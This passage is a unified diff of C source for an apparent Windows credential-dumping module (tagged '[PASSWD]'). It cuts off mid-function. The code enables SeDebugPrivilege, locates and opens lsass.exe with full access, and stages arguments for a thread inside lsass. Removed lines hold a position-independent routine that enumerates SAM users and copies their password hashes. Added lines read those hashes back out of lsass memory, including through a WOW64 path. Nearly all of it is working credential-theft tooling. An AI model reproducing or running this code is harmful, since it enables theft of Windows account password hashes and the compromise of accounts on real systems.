-typedef NTSTATUS (WINAPI *LsaCloseType)(LSA_HANDLE);
-
-/* define types for msvcrt */
-typedef void *(*MallocType)(size_t);
-typedef void *(*ReallocType)(void *, size_t);
-typedef void (*FreeType)(void *);
-typedef void *(*MemcpyType)(void *, const void *, size_t);
-
-/* define types for ntdll */
-typedef size_t (*WcstombsType)(char *, const wchar_t *, size_t);
+	NTSTATUS ntStatus = pNtWow64ReadVirtualMemory64(hProcess, lpBaseAddress, lpBuffer, nSize, lpNumberOfBytesRead);
+	if (ntStatus)
+	{
+		RTLNTSTATUSTODOSERROR pRtlNtStatusToDosError = (RTLNTSTATUSTODOSERROR)GetProcAddress(hNtdll, "RtlNtStatusToDosError");
+		if (pRtlNtStatusToDosError)
+		{
+			SetLastError(pRtlNtStatusToDosError(ntStatus));
+		}
+		else
+		{
+			SetLastError(ERROR_READ_FAULT);
+		}
+		return FALSE;
+	}
+	return TRUE;
+}
 
 char *string_combine(char *string1, char *string2)
 {
@@ -158,13 +86,26 @@ char *string_combine(char *string1, char *string2)
 		strncpy_s(string1, s2len + 1, string2, s2len + 1);
 	}
 	else
-	{			   // append data to the string
+	{
+		// append data to the string
 		s1len = strlen(string1);
 		string1 = (char *)realloc(string1, s1len + s2len + 1);
 		strncat_s(string1, s1len + s2len + 1, string2, s2len + 1);
 	}
 
 	return string1;
+}
+
+BOOL string_endswith(PCHAR string, PCHAR suffix)
+{
+	SIZE_T stStringLength = strlen(string);
+	SIZE_T stSuffixLength = strlen(suffix);
+
+	if (stStringLength < stSuffixLength)
+	{
+		return FALSE;
+	}
+	return strcmp(string + stStringLength - stSuffixLength, suffix) == 0;
 }
 
 /* retrieve a handle to lsass.exe */
@@ -175,17 +116,15 @@ char *string_combine(char *string1, char *string2)
  */
 HANDLE get_lsass_handle()
 {
-
-	DWORD	dwProcessList[1024];
-	DWORD	dwProcessListSize;
-	HANDLE	hProcess;
-	char	szProcessName[10];
-	DWORD	dwCount;
+	DWORD   dwProcessList[1024];
+	DWORD   dwProcessListSize;
+	HANDLE  hProcess;
+	CHAR    ImageFileName[MAX_PATH];
+	DWORD   dwCount;
 
 	/* enumerate all pids on the system */
 	if (EnumProcesses(dwProcessList, sizeof(dwProcessList), &dwProcessListSize))
 	{
-
 		/* only look in the first 256 process ids for lsass.exe */
 		if (dwProcessListSize > sizeof(dwProcessList))
 		{
@@ -193,14 +132,16 @@ HANDLE get_lsass_handle()
 		}
 
 		/* iterate through all pids, retrieve the executable name, and match to lsass.exe */
-		for (dwCount = 0; dwCount < dwProcessListSize; dwCount++)
+		for (dwCount = 0; dwCount < (dwProcessListSize / sizeof(DWORD)); dwCount++)
 		{
 			if (hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwProcessList[dwCount]))
 			{
-				if (GetModuleBaseName(hProcess, NULL, szProcessName, sizeof(szProcessName))
-					&& strcmp(szProcessName, "lsass.exe") == 0)
+				if (GetProcessImageFileName(hProcess, ImageFileName, sizeof(ImageFileName)))
 				{
-					return hProcess;
+					if (string_endswith(ImageFileName, "\\lsass.exe"))
+					{
+						return hProcess;
+					}
 				}
 				CloseHandle(hProcess);
 			}
@@ -215,443 +156,246 @@ HANDLE get_lsass_handle()
 DWORD set_access_priv()
 {
 	DWORD dwResult;
-    HANDLE hToken = NULL;
-    TOKEN_PRIVILEGES priv;
+	HANDLE hToken = NULL;
+	TOKEN_PRIVILEGES priv;
 
 	do
 	{
 		/* open the current process token, retrieve the LUID for SeDebug, enable the privilege, reset the token information */
 		if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken))
-		{
-			dwResult = GetLastError();
-			dprintf("[PASSWD] Failed to open process: %u (%x)", dwResult, dwResult);
-			break;
-		}
+			BREAK_ON_ERROR("[PASSWD] Failed to open process");
 
 		if (!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &priv.Privileges[0].Luid))
-		{
-			dwResult = GetLastError();
-			dprintf("[PASSWD] Failed to lookup priv value: %u (%x)", dwResult, dwResult);
-			break;
-		}
+			BREAK_ON_ERROR("[PASSWD] Failed to lookup priv value");
 
 		priv.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
 		priv.PrivilegeCount = 1;
 
 		if (!AdjustTokenPrivileges(hToken, FALSE, &priv, 0, NULL, NULL))
-		{
-			dwResult = GetLastError();
-			dprintf("[PASSWD] Failed to adjust token privs: %u (%x)", dwResult, dwResult);
-			break;
-		}
+			BREAK_ON_ERROR("[PASSWD] Failed to adjust token privs");
 
 		dwResult = ERROR_SUCCESS;
 	} while (0);
 
-	if (hToken != NULL)
-	{
+	if (hToken)
 		CloseHandle(hToken);
-	}
 
 	return dwResult;
 }
-
-/*!
- * @brief Function that is copied to lsass and run in a separate thread to dump hashes.
- * @param fargs Collection of arguments containing important information, handles and pointers.
- * @remark The code in this fuction _must_ be position-independent. No direct calls to functions
- *         are to be made.
- */
-DWORD dump_sam(FUNCTIONARGS *fargs)
-{
-	/* variables for samsrv function pointers */
-	HANDLE hSamSrv = NULL, hSam = NULL;
-	SamIConnectType pSamIConnect;
-	SamrOpenDomainType pSamrOpenDomain;
-	SamrEnumerateUsersInDomainType pSamrEnumerateUsersInDomain;
-	SamrOpenUserType pSamrOpenUser;
-	SamrQueryInformationUserType pSamrQueryInformationUser;
-	SamIFree_SAMPR_USER_INFO_BUFFERType pSamIFree_SAMPR_USER_INFO_BUFFER;
-	SamIFree_SAMPR_ENUMERATION_BUFFERType pSamIFree_SAMPR_ENUMERATION_BUFFER;
-	SamrCloseHandleType pSamrCloseHandle;
-
-	/* variables for samsrv functions */
-	HANDLE hEnumerationHandle = NULL, hDomain = NULL, hUser = NULL;
-	SAM_DOMAIN_USER_ENUMERATION *pEnumeratedUsers = NULL;
-	DWORD dwNumberOfUsers = 0;
-	PVOID pvUserInfo = 0;
-
-	/* variables for advapi32 function pointers */
-	HANDLE hAdvApi32 = NULL;
-	LsaOpenPolicyType pLsaOpenPolicy;
-	LsaQueryInformationPolicyType pLsaQueryInformationPolicy;
-	LsaCloseType pLsaClose;
-
-	/* variables for advapi32 functions */
-	LSA_HANDLE hLSA = NULL;
-	LSA_OBJECT_ATTRIBUTES ObjectAttributes;
-	POLICY_ACCOUNT_DOMAIN_INFO *pAcctDomainInfo = NULL;
-
-	/* variables for msvcrt */
-	HANDLE hMsvcrt = NULL;
-	MallocType pMalloc;
-	ReallocType pRealloc;
-	FreeType pFree;
-	MemcpyType pMemcpy;
-
-	/* variables for ntdll */
-	HANDLE hNtDll = NULL;
-	WcstombsType pWcstombs;
-
-	/* general variables */
-	NTSTATUS status;
-	HANDLE hReadLock = NULL, hFreeLock = NULL;
-	DWORD dwUsernameLength = 0, dwCurrentUser = 0, dwStorageIndex = 0;
-	DWORD dwError = 0;
-	DWORD i;
-
-	/* load samsrv functions */
-	hSamSrv = fargs->LoadLibrary(fargs->samsrvdll);
-	if (hSamSrv == NULL)
-	{
-		dwError = 1;
-		goto cleanup;
-	}
-
-	pSamIConnect = (SamIConnectType)fargs->GetProcAddress(hSamSrv, fargs->samiconnect);
-	pSamrOpenDomain = (SamrOpenDomainType)fargs->GetProcAddress(hSamSrv, fargs->samropendomain);
-	pSamrEnumerateUsersInDomain = (SamrEnumerateUsersInDomainType)fargs->GetProcAddress(hSamSrv, fargs->samrenumerateusersindomain);
-	pSamrOpenUser = (SamrOpenUserType)fargs->GetProcAddress(hSamSrv, fargs->samropenuser);
-	pSamrQueryInformationUser = (SamrQueryInformationUserType)fargs->GetProcAddress(hSamSrv, fargs->samrqueryinformationuser);
-	pSamIFree_SAMPR_USER_INFO_BUFFER = (SamIFree_SAMPR_USER_INFO_BUFFERType)fargs->GetProcAddress(hSamSrv, fargs->samifree_sampr_user_info_buffer);
-	pSamIFree_SAMPR_ENUMERATION_BUFFER = (SamIFree_SAMPR_ENUMERATION_BUFFERType)fargs->GetProcAddress(hSamSrv, fargs->samifree_sampr_enumeration_buffer);
-	pSamrCloseHandle = (SamrCloseHandleType)fargs->GetProcAddress(hSamSrv, fargs->samrclosehandle);
-
-	if (!pSamIConnect || !pSamrOpenDomain || !pSamrEnumerateUsersInDomain || !pSamrOpenUser || !pSamrQueryInformationUser ||
-		!pSamIFree_SAMPR_USER_INFO_BUFFER || !pSamIFree_SAMPR_ENUMERATION_BUFFER || !pSamrCloseHandle)
-	{
-		dwError = 1;
-		goto cleanup;
-	}
-
-	/* load advadpi32 functions */
-	hAdvApi32 = fargs->LoadLibrary(fargs->advapi32dll);
-	if (hAdvApi32 == NULL)
-	{
-		dwError = 1;
-		goto cleanup;
-	}
-
-	pLsaOpenPolicy = (LsaOpenPolicyType)fargs->GetProcAddress(hAdvApi32, fargs->lsaopenpolicy);
-	pLsaQueryInformationPolicy = (LsaQueryInformationPolicyType)fargs->GetProcAddress(hAdvApi32, fargs->lsaqueryinformationpolicy);
-	pLsaClose = (LsaCloseType)fargs->GetProcAddress(hAdvApi32, fargs->lsaclose);
-	if (!pLsaOpenPolicy || !pLsaQueryInformationPolicy || !pLsaClose)
-	{
-		dwError = 1;
-		goto cleanup;
-	}
-
-	/* load msvcrt functions */
-	hMsvcrt = fargs->LoadLibrary(fargs->msvcrtdll);
-	if (hMsvcrt == NULL)
-	{
-		dwError = 1;
-		goto cleanup;
-	}
-
-	pMalloc = (MallocType)fargs->GetProcAddress(hMsvcrt, fargs->malloc);
-	pRealloc = (ReallocType)fargs->GetProcAddress(hMsvcrt, fargs->realloc);
-	pFree = (FreeType)fargs->GetProcAddress(hMsvcrt, fargs->free);
-	pMemcpy = (MemcpyType)fargs->GetProcAddress(hMsvcrt, fargs->memcpy);
-	if (!pMalloc || !pRealloc || !pFree || !pMemcpy)
-	{
-		dwError = 1;
-		goto cleanup;
-	}
-
-	/* load ntdll functions */
-	hNtDll = fargs->LoadLibrary(fargs->ntdlldll);
-	if (hNtDll == NULL)
-	{
-		dwError = 1;
-		goto cleanup;
-	}
-
-	pWcstombs = (WcstombsType)fargs->GetProcAddress(hNtDll, fargs->wcstombs);
-	if (!pWcstombs)
-	{
-		dwError = 1;
-		goto cleanup;
-	}
-
-	/* initialize the LSA_OBJECT_ATTRIBUTES structure */
-	ObjectAttributes.RootDirectory = NULL;
-	ObjectAttributes.ObjectName = NULL;
-	ObjectAttributes.Attributes = 0;
-	ObjectAttributes.SecurityDescriptor = NULL;
-	ObjectAttributes.SecurityQualityOfService = NULL;
-	ObjectAttributes.Length = sizeof(LSA_OBJECT_ATTRIBUTES);
-
-	/* open a handle to the LSA policy */
-	if (pLsaOpenPolicy(NULL, &ObjectAttributes, POLICY_ALL_ACCESS, &hLSA) < 0)
-	{
-		dwError = 1;
-		goto cleanup;
-	}
-
-	if (pLsaQueryInformationPolicy(hLSA, PolicyAccountDomainInformation, (LPVOID*)&pAcctDomainInfo) < 0)
-	{
-		dwError = 1;
-		goto cleanup;
-	}
-
-	/* connect to the SAM database */
-	if (pSamIConnect(0, &hSam, MAXIMUM_ALLOWED, 1) < 0)
-	{
-		dwError = 1;
-		goto cleanup;
-	}
-	if (pSamrOpenDomain(hSam, 0xf07ff, pAcctDomainInfo->DomainSid, &hDomain) < 0)
-	{
-		dwError = 1;
-		goto cleanup;
-	}
-
-	/* enumerate all users and store username, rid, and hashes */
-	do
-	{
-		status = pSamrEnumerateUsersInDomain(hDomain, &hEnumerationHandle, 0, &pEnumeratedUsers, 0xFFFF, &dwNumberOfUsers);
-		if (status < 0)
-		{
-			break;
-		}	// error
-									// 0x0 = no more, 0x105 = more users
-		if (!dwNumberOfUsers)
-		{
-			break;
-		}	// exit if no users remain
-
-		if (fargs->dwDataSize == 0)
-		{	// first allocation
-			fargs->dwDataSize = dwNumberOfUsers * sizeof(USERNAMEHASH);
-			fargs->pUsernameHashData = pMalloc(fargs->dwDataSize);
-		}
-		else
-		{						// subsequent allocations
-			fargs->dwDataSize += dwNumberOfUsers * sizeof(USERNAMEHASH);
-			fargs->pUsernameHashData = pRealloc(fargs->pUsernameHashData, fargs->dwDataSize);
-		}
-		if (fargs->pUsernameHashData == NULL)
-		{
-			dwError = 1;
-			goto cleanup;
-		}
-
-		for (dwCurrentUser = 0; dwCurrentUser < dwNumberOfUsers; dwCurrentUser++)
-		{
-
-			if (pSamrOpenUser(hDomain, MAXIMUM_ALLOWED, pEnumeratedUsers->pSamDomainUser[dwCurrentUser].dwUserId, &hUser) < 0)
-			{
-				dwError = 1;
-				goto cleanup;
-			}
-			if (pSamrQueryInformationUser(hUser, SAM_USER_INFO_PASSWORD_OWFS, &pvUserInfo) < 0)
-			{
-				dwError = 1;
-				goto cleanup;
-			}
-
-			/* allocate space for another username */
-			dwUsernameLength = (pEnumeratedUsers->pSamDomainUser[dwCurrentUser].wszUsername.Length / 2);
-			(fargs->pUsernameHashData)[dwStorageIndex].Username = (char *)pMalloc(dwUsernameLength + 1);
-			if ((fargs->pUsernameHashData)[dwStorageIndex].Username == NULL)
-			{
-				dwError = 1;
-				goto cleanup;
-			}
-			for ( i=0; i < (dwUsernameLength + 1); i++ )
-			{
-				(fargs->pUsernameHashData)[dwStorageIndex].Username[i] = 0;
-			}
-
-			/* copy over the new name, length, rid and password hash */
-			pWcstombs((fargs->pUsernameHashData)[dwStorageIndex].Username, pEnumeratedUsers->pSamDomainUser[dwCurrentUser].wszUsername.Buffer, dwUsernameLength);
-			(fargs->pUsernameHashData)[dwStorageIndex].Length = dwUsernameLength;
-			(fargs->pUsernameHashData)[dwStorageIndex].RID = pEnumeratedUsers->pSamDomainUser[dwCurrentUser].dwUserId;
-			pMemcpy((fargs->pUsernameHashData)[dwStorageIndex].Hash, pvUserInfo, 32);
-
-			/* clean up */
-			pSamIFree_SAMPR_USER_INFO_BUFFER(pvUserInfo, SAM_USER_INFO_PASSWORD_OWFS);
-			pSamrCloseHandle(&hUser);
-			pvUserInfo = 0;
-			hUser = 0;
-
-			/* move to the next storage element */
-			dwStorageIndex++;
-		}
-
-		pSamIFree_SAMPR_ENUMERATION_BUFFER(pEnumeratedUsers);
-		pEnumeratedUsers = NULL;
-
-	} while (status == 0x105);
-
-	/* set the event to signify that the data is ready */
-	hReadLock = fargs->OpenEvent(EVENT_MODIFY_STATE, FALSE, fargs->ReadSyncEvent);
-	if (hReadLock == NULL)
-	{
-		dwError = 1;
-		goto cleanup;
-	}
-	if (fargs->SetEvent(hReadLock) == 0)
-	{
-		dwError = 1;
-		goto cleanup;
-	}
-
-	/* wait for the copying to finish before freeing all the allocated memory */
-	hFreeLock = fargs->OpenEvent(EVENT_ALL_ACCESS, FALSE, fargs->FreeSyncEvent);
-	if (hFreeLock == NULL)
-	{
-		dwError = 1;
-		goto cleanup;
-	}
-	if (fargs->WaitForSingleObject(hFreeLock, fargs->dwMillisecondsToWait) != WAIT_OBJECT_0)
-	{
-		dwError = 1;
-		goto cleanup;
-	}
-
-cleanup:
-
-	/* free all the allocated memory */
-	for (dwCurrentUser = 0; dwCurrentUser < dwStorageIndex; dwCurrentUser++)
-	{
-		pFree((fargs->pUsernameHashData)[dwCurrentUser].Username);
-	}
-	pFree(fargs->pUsernameHashData);
-
-	/* close all handles */
-	pSamrCloseHandle(&hDomain);
-	pSamrCloseHandle(&hSam);
-	pLsaClose(hLSA);
-
-	/* free library handles */
-	if (hSamSrv)
-	{
-		fargs->FreeLibrary(hSamSrv);
-	}
-	if (hAdvApi32)
-	{
-		fargs->FreeLibrary(hAdvApi32);
-	}
-	if (hMsvcrt)
-	{
-		fargs->FreeLibrary(hMsvcrt);
-	}
-	if (hNtDll)
-	{
-		fargs->FreeLibrary(hNtDll);
-	}
-
-	/* signal that the memory deallocation is complete */
-	fargs->SetEvent(hReadLock);
-	fargs->CloseHandle(hReadLock);
-
-	/* release the free handle */
-	fargs->CloseHandle(hFreeLock);
-
-	/* return correct code */
-	return dwError;
-}
-
-#ifdef _WIN64
-#define sizer setup_dump_sam_arguments
-#else
-void sizer() {}
-#endif
 
 /*!
  * @brief Initialize the context structure that is used for retaining context in the remote thread.
- * @returns Indcation of success or failure.
+ * @returns Indcation of success or failure. 32-bit version.
  */
-DWORD setup_dump_sam_arguments(FUNCTIONARGS *fargs, DWORD dwMillisecondsToWait)
+DWORD setup_dump_sam_arguments32(FUNCTIONARGS32 *fargs, DWORD dwMillisecondsToWait)
 {
-	DWORD dwResult;
-	HMODULE hLibrary = NULL;
+	if (!fargs)
+	{
+		SetLastError(ERROR_INVALID_PARAMETER);
+		return ERROR_INVALID_PARAMETER;
+	}
+
+	/* initialize kernel sync objects */
+	_snprintf_s(fargs->ReadSyncEvent, sizeof(fargs->ReadSyncEvent), _TRUNCATE, "Global\\%04x%04x", rand(), rand());
+	_snprintf_s(fargs->FreeSyncEvent, sizeof(fargs->FreeSyncEvent), _TRUNCATE, "Global\\%04x%04x", rand(), rand());
+
+	/* initialize wait time */
+	fargs->dwMillisecondsToWait = dwMillisecondsToWait;
+
+	/* initailize variables */
+	fargs->dwDataSize = 0;
+	fargs->UsernameHashData.ptr = NULL;
+
+	return ERROR_SUCCESS;
+}
+
+/*!
+ * @brief Initialize the context structure that is used for retaining context in the remote thread.
+ * @returns Indcation of success or failure. 64-bit version.
+ */
+DWORD setup_dump_sam_arguments64(FUNCTIONARGS64* fargs, DWORD dwMillisecondsToWait)
+{
+	if (!fargs)
+	{
+		SetLastError(ERROR_INVALID_PARAMETER);
+		return ERROR_INVALID_PARAMETER;
+	}
+
+	/* initialize kernel sync objects */
+	_snprintf_s(fargs->ReadSyncEvent, sizeof(fargs->ReadSyncEvent), _TRUNCATE, "Global\\%04x%04x", rand(), rand());
+	_snprintf_s(fargs->FreeSyncEvent, sizeof(fargs->FreeSyncEvent), _TRUNCATE, "Global\\%04x%04x", rand(), rand());
+
+	/* initialize wait time */
+	fargs->dwMillisecondsToWait = dwMillisecondsToWait;
+
+	/* initailize variables */
+	fargs->dwDataSize = 0;
+	fargs->UsernameHashData.ptr = NULL;
+
+	return ERROR_SUCCESS;
+}
+
+void free_usernamehash(USERNAMEHASH *pUsernameHash, DWORD dwNumberOfUsers)
+{
+	for (DWORD dwCurrentUserIndex = 0; dwCurrentUserIndex < dwNumberOfUsers; dwCurrentUserIndex++)
+	{
+		if (pUsernameHash[dwCurrentUserIndex].Username.ptr)
+			free(pUsernameHash[dwCurrentUserIndex].Username.ptr);
+	}
+	free(pUsernameHash);
+	return;
+}
+
+DWORD process_dump_sam_response(HANDLE hLsassHandle, FUNCTIONARGS* pFunctionArguments, USERNAMEHASH **ppUsernameHashResults, PDWORD pdwNumberOfUsers)
+{
+	DWORD dwResult = ERROR_SUCCESS;
+	DWORD dwNumberOfUsers = 0;
+	SIZE_T stBytesRead = 0;
+	USERNAMEHASH *pUsernameHashResults = NULL;
 
 	do
 	{
-		/* set loadlibrary and getprocaddress function addresses */
-		hLibrary = LoadLibrary("kernel32");
-		if (hLibrary == NULL)
+		/* determine the number of elements and copy over the data */
+		dwNumberOfUsers = pFunctionArguments->dwDataSize / sizeof(USERNAMEHASH);
+		dprintf("[PASSWD] Dumping data for %u users", dwNumberOfUsers);
+
+		/* allocate space for the results */
+		pUsernameHashResults = (USERNAMEHASH*)calloc(dwNumberOfUsers, sizeof(USERNAMEHASH));
+		if (!pUsernameHashResults)
 		{
-			BREAK_ON_ERROR("[PASSWD] Unable to get kernel32 handle");
+			BREAK_WITH_ERROR("[PASSWD] Not enough memory to allocate USERNAMEHASH array", ERROR_NOT_ENOUGH_MEMORY);
 		}
 
-		fargs->LoadLibrary = (LoadLibraryType)GetProcAddress(hLibrary, "LoadLibraryA");
-		fargs->GetProcAddress = (GetProcAddressType)GetProcAddress(hLibrary, "GetProcAddress");
-		fargs->FreeLibrary = (FreeLibraryType)GetProcAddress(hLibrary, "FreeLibrary");
-		fargs->OpenEvent = (OpenEventType)GetProcAddress(hLibrary, "OpenEventA");
-		fargs->SetEvent = (SetEventType)GetProcAddress(hLibrary, "SetEvent");
-		fargs->CloseHandle = (CloseHandleType)GetProcAddress(hLibrary, "CloseHandle");
-		fargs->WaitForSingleObject = (WaitForSingleObjectType)GetProcAddress(hLibrary, "WaitForSingleObject");
-
-		if (!fargs->LoadLibrary || !fargs->GetProcAddress || !fargs->FreeLibrary || !fargs->OpenEvent || !fargs->SetEvent || !fargs->CloseHandle || !fargs->WaitForSingleObject)
+		/* copy the context structure */
+		if (!ReadProcessMemory(hLsassHandle, pFunctionArguments->UsernameHashData.ptr, pUsernameHashResults, pFunctionArguments->dwDataSize, &stBytesRead))
 		{
-			dwResult = ERROR_INVALID_PARAMETER;
-			dprintf("[PASSWD] Unable to find all required functions");
-			break;
+			BREAK_ON_ERROR("[PASSWD] Failed to read process memory to get user hash data");
 		}
+		if (stBytesRead != pFunctionArguments->dwDataSize)
+		{
+			BREAK_WITH_ERROR("[PASSWD] Failed to read process memory to get user hash data (incomplete read)", ERROR_PARTIAL_COPY);
+		}
+		stBytesRead = 0;
 
-		/* initialize samsrv strings */
-		strncpy_s(fargs->samsrvdll, sizeof(fargs->samsrvdll), "samsrv.dll", sizeof(fargs->samsrvdll));
-		strncpy_s(fargs->samiconnect, sizeof(fargs->samiconnect), "SamIConnect", sizeof(fargs->samiconnect));
-		strncpy_s(fargs->samropendomain, sizeof(fargs->samropendomain), "SamrOpenDomain", sizeof(fargs->samropendomain));
-		strncpy_s(fargs->samropenuser, sizeof(fargs->samropenuser), "SamrOpenUser", sizeof(fargs->samropenuser));
-		strncpy_s(fargs->samrqueryinformationuser, sizeof(fargs->samrqueryinformationuser), "SamrQueryInformationUser", sizeof(fargs->samrqueryinformationuser));
-		strncpy_s(fargs->samrenumerateusersindomain, sizeof(fargs->samrenumerateusersindomain), "SamrEnumerateUsersInDomain", sizeof(fargs->samrenumerateusersindomain));
-		strncpy_s(fargs->samifree_sampr_user_info_buffer, sizeof(fargs->samifree_sampr_user_info_buffer), "SamIFree_SAMPR_USER_INFO_BUFFER", sizeof(fargs->samifree_sampr_user_info_buffer));
-		strncpy_s(fargs->samifree_sampr_enumeration_buffer, sizeof(fargs->samifree_sampr_enumeration_buffer), "SamIFree_SAMPR_ENUMERATION_BUFFER", sizeof(fargs->samifree_sampr_enumeration_buffer));
-		strncpy_s(fargs->samrclosehandle, sizeof(fargs->samrclosehandle), "SamrCloseHandle", sizeof(fargs->samrclosehandle));
+		// save the old mem addy, malloc new space, copy over the data, free the old mem addy
+		for (DWORD dwCurrentUserIndex = 0; dwCurrentUserIndex < dwNumberOfUsers; dwCurrentUserIndex++)
+		{
+			dprintf("[PASSWD] Processing response user #%u", dwCurrentUserIndex + 1);
+			PCHAR pUsernameAddress = pUsernameHashResults[dwCurrentUserIndex].Username.ptr;
 
-		/* initialize advapi32 strings */
-		strncpy_s(fargs->advapi32dll, sizeof(fargs->advapi32dll), "advapi32.dll", sizeof(fargs->advapi32dll));
-		strncpy_s(fargs->lsaopenpolicy, sizeof(fargs->lsaopenpolicy), "LsaOpenPolicy", sizeof(fargs->lsaopenpolicy));
-		strncpy_s(fargs->lsaqueryinformationpolicy, sizeof(fargs->lsaqueryinformationpolicy), "LsaQueryInformationPolicy", sizeof(fargs->lsaqueryinformationpolicy));
-		strncpy_s(fargs->lsaclose, sizeof(fargs->lsaclose), "LsaClose", sizeof(fargs->lsaclose));
+			pUsernameHashResults[dwCurrentUserIndex].Username.ptr = (char*)calloc(pUsernameHashResults[dwCurrentUserIndex].Length + 1, sizeof(char));
+			if (!pUsernameHashResults[dwCurrentUserIndex].Username.ptr)
+			{
+				BREAK_WITH_ERROR("[PASSWD] Failed to allocate memory for the username", ERROR_NOT_ENOUGH_MEMORY);
+			}
 
-		/* initialize msvcrt strings */
-		strncpy_s(fargs->msvcrtdll, sizeof(fargs->msvcrtdll), "msvcrt.dll", sizeof(fargs->msvcrtdll));
-		strncpy_s(fargs->malloc, sizeof(fargs->malloc), "malloc", sizeof(fargs->malloc));
-		strncpy_s(fargs->realloc, sizeof(fargs->realloc), "realloc", sizeof(fargs->realloc));
-		strncpy_s(fargs->free, sizeof(fargs->free), "free", sizeof(fargs->free));
-		strncpy_s(fargs->memcpy, sizeof(fargs->memcpy), "memcpy", sizeof(fargs->memcpy));
+			if (!ReadProcessMemory(hLsassHandle, pUsernameAddress, pUsernameHashResults[dwCurrentUserIndex].Username.ptr, pUsernameHashResults[dwCurrentUserIndex].Length, &stBytesRead))
+			{
+				BREAK_ON_ERROR("[PASSWD] Failed to read process memory to get username");
+			}
+			if (stBytesRead != pUsernameHashResults[dwCurrentUserIndex].Length)
+			{
+				BREAK_WITH_ERROR("[PASSWD] Failed to read process memory to get username (incomplete read)", ERROR_PARTIAL_COPY);
+			}
+		}
+	} while (FALSE);
 
-		/* initialize ntdll strings */
-		strncpy_s(fargs->ntdlldll, sizeof(fargs->ntdlldll), "ntdll.dll", sizeof(fargs->ntdlldll));
-		strncpy_s(fargs->wcstombs, sizeof(fargs->wcstombs), "wcstombs", sizeof(fargs->wcstombs));
-
-		/* initialize kernel sync objects */
-		strncpy_s(fargs->ReadSyncEvent, sizeof(fargs->ReadSyncEvent), READ_SYNC_EVENT_NAME, sizeof(fargs->ReadSyncEvent));
-		strncpy_s(fargs->FreeSyncEvent, sizeof(fargs->FreeSyncEvent), FREE_SYNC_EVENT_NAME, sizeof(fargs->FreeSyncEvent));
-
-		/* initialize wait time */
-		fargs->dwMillisecondsToWait = dwMillisecondsToWait;
-
-		/* initailize variables */
-		fargs->dwDataSize = 0;
-		fargs->pUsernameHashData = NULL;
-
-		dwResult = ERROR_SUCCESS;
-	} while (0);
-
-	if (hLibrary != NULL)
+	if (dwResult == ERROR_SUCCESS)
 	{
-		FreeLibrary(hLibrary);
+		*pdwNumberOfUsers = dwNumberOfUsers;
+		*ppUsernameHashResults = pUsernameHashResults;
 	}
-
+	else
+	{
+		*pdwNumberOfUsers = 0;
+		*ppUsernameHashResults = NULL;
+		if (pUsernameHashResults)  // if something went wrong, free everything we allocated
+			free(pUsernameHashResults);
+	}
 	return dwResult;
 }
+
+#ifndef _WIN64
+DWORD process_dump_sam_response_wow64(HANDLE hLsassHandle, FUNCTIONARGS64* pFunctionArguments, USERNAMEHASH32** ppUsernameHashResults, PDWORD pdwNumberOfUsers)
+{
+	DWORD dwResult = ERROR_SUCCESS;
+	DWORD dwNumberOfUsers = 0;
+	ULONG64 ulBytesRead = 0;
+	USERNAMEHASH64* pUsernameHashRemote = NULL;
+	USERNAMEHASH32* pUsernameHashLocal = NULL;
+
+	dprintf("[PASSWD] Dumping wow64 SAM response data");
+	do
+	{
+		/* determine the number of elements and copy over the data */
+		dwNumberOfUsers = pFunctionArguments->dwDataSize / sizeof(USERNAMEHASH64);
+		dprintf("[PASSWD] Dumping data for %u users", dwNumberOfUsers);
+
+		/* allocate space for the results */
+		pUsernameHashLocal = (USERNAMEHASH32*)calloc(dwNumberOfUsers, sizeof(USERNAMEHASH32));
+		if (!pUsernameHashLocal)
+		{
+			BREAK_WITH_ERROR("[PASSWD] Not enough memory to allocate USERNAMEHASH32 array", ERROR_NOT_ENOUGH_MEMORY);
+		}
+		pUsernameHashRemote = (USERNAMEHASH64*)calloc(dwNumberOfUsers, sizeof(USERNAMEHASH64));
+		if (!pUsernameHashRemote)
+		{
+			BREAK_WITH_ERROR("[PASSWD] Not enough memory to allocate USERNAMEHASH64 array", ERROR_NOT_ENOUGH_MEMORY);
+		}
+
+		/* copy the context structure */
+		if (!ReadProcessMemory64(hLsassHandle, pFunctionArguments->UsernameHashData.ul, pUsernameHashRemote, pFunctionArguments->dwDataSize, &ulBytesRead))
+		{
+			BREAK_ON_ERROR("[PASSWD] Failed to read process memory to get user hash data");
+		}
+		if (ulBytesRead != pFunctionArguments->dwDataSize)
+		{
+			BREAK_WITH_ERROR("[PASSWD] Failed to read process memory to get user hash data (incomplete read)", ERROR_PARTIAL_COPY);
+		}
+		ulBytesRead = 0;
+
+		// save the old mem addy, malloc new space, copy over the data, free the old mem addy
+		for (DWORD dwCurrentUserIndex = 0; dwCurrentUserIndex < dwNumberOfUsers; dwCurrentUserIndex++)
+		{
+			dprintf("[PASSWD] Processing response user #%u", dwCurrentUserIndex + 1);
+
+			pUsernameHashLocal[dwCurrentUserIndex].Length = pUsernameHashRemote[dwCurrentUserIndex].Length;
+			pUsernameHashLocal[dwCurrentUserIndex].RID = pUsernameHashRemote[dwCurrentUserIndex].RID;
+			memcpy(pUsernameHashLocal[dwCurrentUserIndex].Hash, pUsernameHashRemote[dwCurrentUserIndex].Hash, sizeof(pUsernameHashLocal[dwCurrentUserIndex].Hash));
+			pUsernameHashLocal[dwCurrentUserIndex].Username.ptr = (char*)calloc(pUsernameHashRemote[dwCurrentUserIndex].Length + 1, sizeof(char));
+			if (!pUsernameHashLocal[dwCurrentUserIndex].Username.ptr)
+			{
+				BREAK_WITH_ERROR("[PASSWD] Failed to allocate memory for the username", ERROR_NOT_ENOUGH_MEMORY);
+			}
+
+			if (!ReadProcessMemory64(hLsassHandle, pUsernameHashRemote[dwCurrentUserIndex].Username.ul, pUsernameHashLocal[dwCurrentUserIndex].Username.ptr, pUsernameHashRemote[dwCurrentUserIndex].Length, &ulBytesRead))
+			{
+				BREAK_ON_ERROR("[PASSWD] Failed to read process memory to get username");
+			}
+			if (ulBytesRead != pUsernameHashRemote[dwCurrentUserIndex].Length)
+			{
+				BREAK_WITH_ERROR("[PASSWD] Failed to read process memory to get username (incomplete read)", ERROR_PARTIAL_COPY);
+			}
+		}
+	} while (FALSE);
+
+	if (dwResult == ERROR_SUCCESS)
+	{
+		*pdwNumberOfUsers = dwNumberOfUsers;
+		*ppUsernameHashResults = pUsernameHashLocal;
+	}
+	else
+	{
+		*pdwNumberOfUsers = 0;
+		*ppUsernameHashResults = NULL;
